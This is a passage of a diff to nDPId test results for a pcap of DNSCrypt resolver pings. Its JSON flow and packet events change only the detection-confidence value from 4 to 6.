failed","datalink":1,"packet_id":200,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311153} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":200,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEcAub0RRbIKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":946739311306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739311306,"pkt":"ZmZmZmZmRERERERECABFAADShQAAADIRADHNuXR0CgAAAQIpqggAvpKvnSmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAn\/hr1LBKsWo8ISWGing3CJIxyJebVH0i+FiEft0kNqLwa8d8MG0HYasP8XBuGRRYuXbJWON+8OmftD\/GOCqkDQBv6De0v2\/+w89vsWNxuh1o1S9D9qyf\/kIslLiOA5h7AG\/oN7S\/b\/5fU2VhX1NlYV9UtuE="} @@ -407,26 +407,26 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":946739311314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739311314,"pkt":"ZmZmZmZmRERERERECABFAADShQMAADIRAC7NuXR0CgAAAQIplYYAvqc0nSaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAn\/hr1LBKsWo8ISWGing3CJIxyJebVH0i+FiEft0kNqLwa8d8MG0HYasP8XBuGRRYuXbJWON+8OmftD\/GOCqkDQBv6De0v2\/+w89vsWNxuh1o1S9D9qyf\/kIslLiOA5h7AG\/oN7S\/b\/5fU2VhX1NlYV9UtuE="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgu5AAL0RWGMKAAABNEHrgdoaAbsCCOKYCnMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgu8gAL0RdKIKAAABNEHrgbTpAbsGBA+NCnABAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgvBAAL0RWGEKAAABNEHrgc6vAbsCCOKYCnEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":210,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311802} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":210,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgu8Aub0RmXUKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgvEgAL0RdKAKAAABNEHrgbpFAbsGBAozCm4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgvJAAL0RWF8KAAABNEHrgdqrAbsCCOKYCm8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":213,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311802} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgvEAub0RmXMKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 